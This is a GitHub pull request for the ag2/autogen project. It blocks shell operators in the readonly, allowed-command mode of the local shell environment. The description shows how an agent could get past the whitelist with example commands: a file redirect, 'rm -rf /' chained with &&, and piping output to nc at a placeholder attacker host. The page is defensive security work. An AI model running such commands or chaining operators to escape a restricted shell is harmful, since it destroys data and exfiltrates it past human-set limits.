Skip to content

fix: block shell operators in readonly/allowed-command mode#2689

Open
Ricardo-M-L wants to merge 4 commits intoag2ai:mainfrom
Ricardo-M-L:fix/readonly-shell-redirect-bypass
Open

fix: block shell operators in readonly/allowed-command mode#2689
Ricardo-M-L wants to merge 4 commits intoag2ai:mainfrom
Ricardo-M-L:fix/readonly-shell-redirect-bypass

Conversation

@Ricardo-M-L
Copy link
Copy Markdown
Contributor

@Ricardo-M-L Ricardo-M-L commented Apr 16, 2026

Why Are These Changes Needed?

LocalShellEnvironment(readonly=True) restricts execution to a whitelist of read-only commands. However, since commands run with shell=True, an agent can bypass this restriction via shell operators:

env = LocalShellEnvironment(readonly=True)

env.run("echo hello")           # ✓ allowed (read-only)
env.run("echo pwned > file.txt") # ✓ ALSO allowed — creates a file!
env.run("cat x && rm -rf /")    # ✓ ALSO allowed — destructive!
env.run("ls | nc attacker 1234") # ✓ ALSO allowed — exfiltrates data!

The matches() function only validates the command prefix ("echo", "cat", "ls") but doesn't detect shell operators (>, |, &&, ;) that follow.

Changes

  1. base.py: Add contains_shell_operator() that detects >, >>, |, ;, &&, ||, and backticks
  2. local.py: When an allowed-command whitelist is active, reject commands containing shell operators

After the fix:

env.run("echo hello")            # ✓ still allowed
env.run("echo pwned > file.txt") # ✗ rejected: shell operators not permitted

Related issue number

N/A (discovered during code review)

Checks

  • I've included any doc changes needed
  • I've made sure all auto checks have passed

Verification

Test coverage (test/beta/tools/test_local_shell.py):

  • test_allowed_permits_matching_command — allowed command without operators executes (touch <path>, file is created)
  • test_allowed_blocks_shell_redirect_bypassecho hello > <path> is rejected even when echo is whitelisted
  • test_allowed_blocks_non_matching_command — non-whitelisted command stays blocked

CI status at head 12f42beff1: 23 / 23 passing (was failing before the test-assertion fix in this commit — the previous test asserted "hello" in str(reply) but reply was the TestConfig final_reply and never contained tool stdout).

When `LocalShellEnvironment(readonly=True)` restricts commands to a
whitelist, the `matches()` check only validates the command prefix.
Since commands run with `shell=True`, an agent can bypass the
restriction via shell operators:

    echo 'data' > file.txt      # write via redirect
    cat /etc/passwd | nc ...    # exfiltrate via pipe
    ls && rm -rf /              # chain destructive command

Add `contains_shell_operator()` that rejects commands containing
`>`, `>>`, `|`, `;`, `&&`, `||`, or backticks when an allowed-command
whitelist is active.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@Ricardo-M-L Ricardo-M-L requested a review from Lancetnik as a code owner April 16, 2026 03:55
@github-actions github-actions Bot added the beta label Apr 16, 2026
Ricardo-M-L and others added 2 commits April 25, 2026 10:16
The original test exercised `echo hello > {output}` with `allowed=["echo"]`
and asserted the file was created — which was exactly the bypass this PR
fixes. Update the test to:

1. Assert plain `echo hello` works (allowed command without operators)
2. Add a new test that asserts `echo hello > {output}` is blocked

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
@marklysze
Copy link
Copy Markdown
Collaborator

@Ricardo-M-L thanks for identifying and working on this. Would you be able to check the failing tests?

The test asserted `"hello" in str(reply)` but `reply` is the
TestConfig final_reply ("done") — the tool's stdout never appears in
the AgentReply, so the assertion always failed in CI even though the
command was correctly executed.

Replace with a touch-based test: allow "touch", run `touch <path>`,
assert the file is created. This mirrors the sibling
`test_allowed_blocks_non_matching_command` (same fixture, opposite
expectation) and verifies side-effecting allowed commands actually
run, which is what the original test name promised.

Addresses the failing tests called out in PR review.
@codecov
Copy link
Copy Markdown

codecov Bot commented May 7, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.

Files with missing lines Coverage Δ
autogen/beta/tools/shell/environment/base.py 85.71% <100.00%> (+1.09%) ⬆️
autogen/beta/tools/shell/environment/local.py 98.24% <100.00%> (+0.09%) ⬆️

... and 116 files with indirect coverage changes

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@Ricardo-M-L
Copy link
Copy Markdown
Contributor Author

@marklysze The failing tests are fixed in 12f42be. Root cause was that the assertion \"hello\" in str(reply) could never pass — reply is the TestConfig final_reply=\"done\" and never contains the tool's stdout, so the test always failed regardless of whether echo hello ran. Replaced with a touch-based test (allowed=[\"touch\"], run touch <path>, assert output.exists()) that mirrors the sibling test_allowed_blocks_non_matching_command pattern (same fixture, opposite expectation).

CI is now green across all 23 checks. Ready for another look when you have a moment 🙏

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants